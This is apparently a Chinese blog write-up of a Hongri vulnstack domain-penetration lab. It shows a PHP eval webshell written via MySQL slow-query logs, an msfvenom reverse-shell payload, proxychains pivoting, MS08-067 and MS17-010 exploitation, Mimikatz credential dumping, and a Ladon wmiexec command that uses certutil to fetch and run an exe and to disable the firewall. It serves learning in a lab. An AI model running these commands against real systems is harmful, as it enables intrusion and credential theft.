内网域渗透靶场学习一

本文最后更新于 525 天前，其中的信息可能已经有所发展或是发生改变。

靶场环境搭建

• 红日靶场：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
• 靶机通用密码：hongrisec@2019
• win7
• win2003
• win2008

IP配置与网络topo图

网卡配置

• kali：vmnet1
• win7：vmnet1 + vmnet2 双网卡
• win2003: vmnet2
• win2008: vmnet2

这样配置的话就网络环境就会和topo图表示的一致，win7是边缘主机，连接着内网同时还有对外的公网ip搭建着web服务，所以多添加一张网卡来划分。

正式渗透

信息收集

最开始的第一步肯定是先进行信息收集，一般情况下都是先攻入边缘主机，然后再利用这台边缘主机来攻击内网。

nmap端口扫描

Nmap使用:https://www.cnblogs.com/weihua2616/p/6599629.html

nmap -sV -A 192.168.31.100
-sV: 指定让Nmap进行版本侦测
-A: 用于使用进攻性（Aggressive）方式扫描
扫描地址为边缘靶机

扫描出两个端口80 3306，一个是web服务一个是数据库。

80端口上搭建的是phpStudy 探针，这个页面泄露了不少内容，比如服务器版本、php版本、绝对路径之类的信息。

目录扫描

御剑扫描

http://192.168.31.100/beifen.rar
http://192.168.31.100/phpmyadmin/
http://192.168.31.100/phpmyadmin/db_create.php

扫描出三个路径，第一个应该是网站的备份文件，第二个是phpmyadmin数据库管理系统

getshell

phpmyadmin弱密码登录

mysql之突破secure_file_priv写shell：https://www.cnblogs.com/c1e4r/articles/8902444.html 这里的phpmyadmin密码是没有进行修改的 root root 成功登录进后台

在有着绝对路径的情况下第一反应肯定是写shell，但是这里执行出现了错误，这是因为在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL。并且无法用sql语句对其进行修改。

select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/WWW/shell.php' 

操作流程

启用慢查询日志

set global slow_query_log=1;

伪造（修改）slow_query_log_file日志文件的绝对路径以及文件名 这里的绝对路径之前已经获取到了

set global slow_query_log_file='dir\filename';

向日志文件写shell

select '<?php eval(@$_POST[cmd]); ?>' or sleep(11);

getshell

yxcms1.2.1 RCE

这玩意百度一下就行了，同样也是弱密码进后台。

后渗透阶段

超实用！手把手教你如何用MSF进行后渗透测试！

上传msf马

先在kali生成msf马

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.31.200 lport=7777 -f exe -o ./msf.exe

• 监听使用的payload
• lhost:本地ip
• lport:本地监听端口

将木马利用之前的一句话木马上传到边缘靶机，现在kali开好监听，再在边缘靶机上运行木马。

信息收集

后渗透攻防的信息收集：https://www.secpulse.com/archives/51527.html 输入shell获取目标主机的远程命令行shell

出现中文乱码问题，输入chcp 65001即可解决

输入systeminfo获取系统具体信息

更多的信息收集就不写了，直接上内网扫描了。

域信息收集

域渗透-域内信息搜集：https://blog.csdn.net/qq_38376348/article/details/109143635

Windows域是计算机网络的一种形式，其中所有用户帐户 ，计算机，打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户，然后可以为该帐户分配对该域内资源的访问权限。 从Windows Server 2003开始 ， Active Directory是负责维护该中央数据库的Windows组件。Windows域的概念与工作组的概念形成对比，在该工作组中，每台计算机都维护自己的安全主体数据库。

net user /domain  # 查看域用户
net group /domain # 查询域组
net view /domain  # 查询域
net group "domain admins" /domain # 查询域管理员
net group "domain computers" /domain #查询域内机器信息

定位域控

net time /domain  # 查询主域服务器时间

查询主域时间也能顺带查出域控的域名，用nslookup即可反查出域控ip

横向渗透

对内网主机进行探测，使用msf的arp_scanner模块。

192.168.52.138是域控制器，192.168.52.141应该是域内主机

想在进行横向渗透之前先需要进行隧道的搭建

msf+proxychains

直接使用msf搭建socks4a隧道

创建路由

run post/multi/manage/autoroute   # 自动创建路由
run autoroute -s 192.168.52.0/24  # 手动添内网的路由
run autoroute -p  # 查看路由

开启代理 我这里使用jobs查看运行的时候出现两个是因为之前我已经开了一个了。

kali修改/etc/proxychains.conf,在最后一行加上socks4代理服务器

[ProxyList]

socks4 192.168.31.200 1080

使用proxychains代理nmap扫描

proxychains nmap -sT -sV -Pn -p22,80,443,135,445 192.168.52.141

使用msf自带扫描器扫描

常见端口漏洞

• 21-FTP，看是否存在匿名访问
• 22-SSH，看是否存在弱口令
• 80-HTTP，常见web漏洞
• 443-openssl，心脏出血
• 445-smb、ms08-067、ms17-010
• 1433-mssql，弱口令
• 1521-oracle，弱口令
• 3389-远程连接桌面
• 6379-redis未授权访问，弱口令
• 8080-tomcat漏洞

这里开放了445端口，可以试着用nmap扫描一下是否存在ms08-067

域成员getshell

ms08-067漏洞利用

Metasploit利用MS08-067漏洞：https://blog.csdn.net/huanghelouzi/article/details/84309473

在做这一步之前需要保证代理是成功的，否者无法进行下一步。

最开始的时候是没有定义双向路由的，所以我们需要定义bind_tcp才能成功攻击，两者区别如下（借用的图）：

完整流程：

成功获取了域成员192.168.1.141的shell

域控getshell

ms17-010漏洞利用

先通过代理nmap扫描一下域控

使用ms17-010漏洞攻击域控，也就是永恒之蓝漏洞

测试一下

利用失败

在这里我尝试了各种利用方式都失败了，如果大家有发现可以利用的方法可以在评论区留言。

cs上线获取域密码

CobaltStrike 4.0 免费汉化版：https://www.jb51.net/softs/772608.html 永恒之蓝是没法利用了，那么就只能用别的方法了，现在控制的边缘靶机win7中上线cs

我服务端搭载了kali，ip地址就是192.168.31.200，端口是默认的，用户名随便，密码填服务端设置的密码。

启动之后就是这个样子，只不过我之前已经做过一次getshell了，所以有这两条连接

创建shell 点击 攻击>生成后门>Windows Executable

监听器需要创建一个，这里只要端口选择不要冲突的就行，IP地址填kali的，http host也添加一条和http host(stager)一致的IP。

然后就会生成一个木马文件，上传到边缘靶机里运行即可

获取账号密码 完成上面的步骤之后在生成的会话上右键 执行>Run Mimikatz

现在看见的密码是hash的，点击如下图按钮：

即可拿到域用户的凭据信息

WMI获取域控权限 ladon7：https://github.com/k8gege/Ladon/releases Windows上自带的渗透测试工具：Certutil: https://zhuanlan.zhihu.com/p/107819644 这里又要用上另一位表哥开源的工具ladon7，其实也就是用来测试一下刚才获取到的密码，这工具挺强大的，后面再单独写一篇文章来介绍这个工具

下载了上传到win7中

命令执行成功了，证明密码正确。

Ladon.exe wmiexec 192.168.52.138 Administrator Abc1234! whoami

生成一个msf马，bind_tcp的，上传到win7

通过Certutil将木马复制到域控中

Ladon.exe wmiexec 192.168.52.138 Administrator Abc1234! "cd C:\Users\Public&certutil.exe -urlcache -split -f http://192.168.52.143/6666.exe&6666.exe"

开启监听

但是一直没见连回来，盲猜是防火墙的问题。

Ladon.exe wmiexec 192.168.52.138 Administrator Abc1234! "netsh advfirewall set allprofiles state off"

防火墙关闭成功

然后关了防火墙之后还是利用不了，然后换回永恒之蓝又成功了。。。

总结

第一次的内网渗透就结束了，做的很久，最后的域控利用阶段忘了关防火墙，导致永恒之蓝利用失败，浪费了一天时间，接下来的靶场继续努力了。

浏览量: 986